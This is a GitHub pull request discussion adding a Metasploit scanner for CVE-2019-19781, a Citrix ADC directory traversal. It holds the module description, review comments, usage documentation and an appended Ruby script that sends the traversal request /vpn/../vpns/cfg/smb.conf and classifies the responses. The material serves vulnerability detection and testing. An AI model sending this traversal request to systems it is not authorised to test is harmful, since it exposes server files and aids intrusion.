Add citrix_directory_traversal module to /modules/auxiliary/scanner/h… #12813
Conversation
Hi! Thanks for this. We'll be making some final changes to the module and landing with #12816, using this module as the exploit's
Hi! Thanks for your message. Please let us know if we can help with additional documentation or anything else at this stage. And it would indeed be great if you could keep us updated about when and in what form you will be including the module. Thanks in advance!
@kalba-security: If you could write module documentation, that would be a task off my list. FYI, there are some sweeping functional and stylistic changes that need to be done in order to merge this. I'll keep you posted before anything hits
def initialize
super(
'Name' => 'Citrix ADC Directory Traversal',
'Description' => 'This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScalers). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presense of a "global" variable in smb.conf, which this file should always contain.',
I've updated the code to check for `global`, since this check is not currently present. Please stand by until I can push my commits for viewing. Thanks!
@wvu-r7 Hey, I have the documentation ready. Let me know if I can add it now.
Otherwise I won't be able to do it until tomorrow.
…On Monday, 13 January 2020, ♄ ***@***.***> wrote:
***@***.**** commented on this pull request.
------------------------------
In modules/auxiliary/scanner/http/citrix_directory_traversal.rb
<#12813 (comment)>
:
> +# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WmapScanServer
+ # Scanner mixin should be near last
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Citrix ADC Directory Traversal',
+ 'Description' => 'This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScalers). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presense of a "global" variable in smb.conf, which this file should always contain.',
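Review bot: the `'Description' =>` string in this hunk says the module looks for the presence of a "global" variable in smb.conf, but the reviewer's reply below says that check is not in the code yet; either land the check or reword the description so it matches what the module actually does. While touching that line, "presense" should be "presence", and since the class is an `Msf::Auxiliary` scanner, "This module exploits" reads better as "This module checks for". The description is also a single very long string; wrap it across lines as other Metasploit modules do.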
I've updated the code to check for global, since this check is not
currently present. Please stand by until I can push my commits for viewing.
Thanks!
@kalba-security: Feel free to push the docs! Thanks!
You ROCK! Thank you so much. I'll update the docs if the code changes can be reflected.
Here is the updated code: master...wvu-r7:pr/12813. I'm happy to explain and justify anything. I will need to merge all of this in the next couple hours.
Looks good!!! @wvu-r7. Quick question, we're not allowed to put email addresses or Twitter handles in by chance are we? Can't remember if that was restricted or not.
Yeah looks great @wvu-r7!! In the documentation I already referenced the global check you added btw.
@altjx: Nope, but it's okay to tack them on as a comment! What Twitter handles do y'all want to use? It's easier to avoid conflicts if I make the commit. Sorry for the situation. :(
Btw, we're planning to convert all
Sounds great! We can use the following:
No worries! I'm on a plane anyway so I wouldn't be able to do it LOL. Thanks so much!
I've improved the
Gotcha!
Release Notes
This adds a scanner for CVE-2019-19781, a directory traversal vulnerability in Citrix Application Delivery Controller (NetScaler).
Off to finish #12816! |
You can find the module in the tree at https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/citrix_dir_traversal.rb.
Thanks so much!! @wvu-r7 I apologize but I typo'd my Twitter handle. It should have been @altonjx, sorry about that.
Doh! No problem, let me fix that for ya.
Thanks again!! 🙏🏽
All fixed. :-)
Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains Perl scripts that can be targeted to allow for limited file writing on the vulnerable host.
This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf` and then checking the response for `global`, since this configuration file should contain global variables. If `global` is found, the server is vulnerable to CVE-2019-19781.
1. `Proxies`. This option is not set by default.
2. `RPORT`. The default setting is `80`. To use: `set RPORT [PORT]`
3. `SSL`. The default setting is `false`.
4. `THREADS`. The default setting is `1`.
5. `VHOST`. This option is not set by default.
'Erik Wynter',
'altonjx',
Traditionally, the author's role is provided in comments, i.e.:

```ruby
[
  'someone',      # discovery and PoC
  'someone else', # metasploit
]
```
This one's fair.
Addressing over in #12816.
@bcoles: Please review against
Also,
Yes, future-proofing. Indeed ridiculous for a single branch. I have other cases I would like to add, but I reached a deadline. ETA: It was originally just
Screw it. I added the
Since it's not documentation anywhere else, the files have been renamed to So, use
The files were renamed while merging into See f1cc40b from #12813 (comment), tbh. I understand everyone wants the code, but PRs are technically WIP until they're merged. Updating is the responsibility of the user in that case. So thanks for dropping a note! The rest of y'all are slackers. ;)
## About

This change adds a new module to /modules/auxiliary/scanner/http/ that can be used to verify whether or not a web server is vulnerable to CVE-2019-19781, a directory traversal in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. For more info about this vulnerability, see: https://nvd.nist.gov/vuln/detail/CVE-2019-19781

## Vulnerable System

Citrix ADC (NetScaler) systems vulnerable to directory traversal (CVE-2019-19781).

## Verification Steps

```
use auxiliary/scanner/http/citrix_directory_traversal
set RHOSTS [target IP or hostname]
run
```

If `200` is received, it will indicate that the target is vulnerable to CVE-2019-19781.

## Options

1. `Proxies`. This option is not set by default.
2. `RPORT`. The default setting is `80`. To use: `set RPORT [target port, default is 80]`
3. `SSL`. The default setting is `false`.
4. `THREADS`. The default setting is `1`.
5. `VHOST`. This option is not set by default.

## Scenarios
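The following is an added example, not the Metasploit module's own code, showing as a stand-alone Ruby script the check that the module description and the verification steps above describe: request `/vpn/../vpns/cfg/smb.conf` and treat a `200` whose body is a real smb.conf (it has a `[global]` section) as vulnerable. The `fetch:` injection point, the four verdict states, and treating every non-200 response (for example a 403 from a mitigation rule) as not vulnerable are assumptions of this example and not behaviour of the module.

```ruby
require 'net/http'
require 'openssl'

# Added example; not the Metasploit module's own code.
# The traversal path from the module description: /vpn/ is a path the
# appliance serves, and the ../ steps back into the /vpns/ tree.
TRAVERSAL_PATH = '/vpn/../vpns/cfg/smb.conf'.freeze

# Pull INI-style section names ([global], [homes], ...) out of an smb.conf body.
def smb_conf_sections(body)
  body.to_s.scan(/^[ \t]*\[([^\]]+)\][ \t]*$/).flatten.map { |s| s.strip.downcase }
end

# Map an HTTP status and body for TRAVERSAL_PATH to a verdict. The states are
# this example's own (the module only reports vulnerable or not):
#   :unreachable    - no HTTP response at all
#   :not_vulnerable - anything other than 200 (a 403 from a mitigation rule
#                     lands here; assumption of this example)
#   :vulnerable     - 200 and the body has a [global] section, i.e. the real smb.conf
#   :unknown        - 200 but no [global] section (login page, WAF, proxy, ...)
def classify_response(status, body)
  return :unreachable if status.nil?
  return :not_vulnerable unless status == 200
  return :vulnerable if smb_conf_sections(body).include?('global')
  :unknown
end

# Plain HTTP(S) GET that sends the path exactly as given. Net::HTTP does not
# collapse "..", which matters here; curl would need --path-as-is.
def http_get(host, port, ssl, path)
  http = Net::HTTP.new(host, port)
  http.use_ssl = ssl
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE if ssl # appliances often use self-signed certs
  http.open_timeout = 10
  http.read_timeout = 10
  res = http.request(Net::HTTP::Get.new(path))
  [res.code.to_i, res.body]
rescue SystemCallError, IOError, Timeout::Error, OpenSSL::SSL::SSLError
  [nil, nil]
end

# Check one host. `fetch` is a hypothetical injection point (not a module
# option) so the classification can be exercised without a network.
# Usage: check_host('gateway.example.com')            # => :vulnerable / :not_vulnerable / ...
#        check_host('gateway.example.com', port: 80, ssl: false)
def check_host(host, port: 443, ssl: true, fetch: method(:http_get))
  status, body = fetch.call(host, port, ssl, TRAVERSAL_PATH)
  classify_response(status, body)
end
```

The `:unknown` state is the one worth keeping: a reverse proxy or login page in front of the appliance can return `200` for the traversal path without serving smb.conf, so matching on the `[global]` section rather than on the status code alone is what keeps the check from reporting false positives.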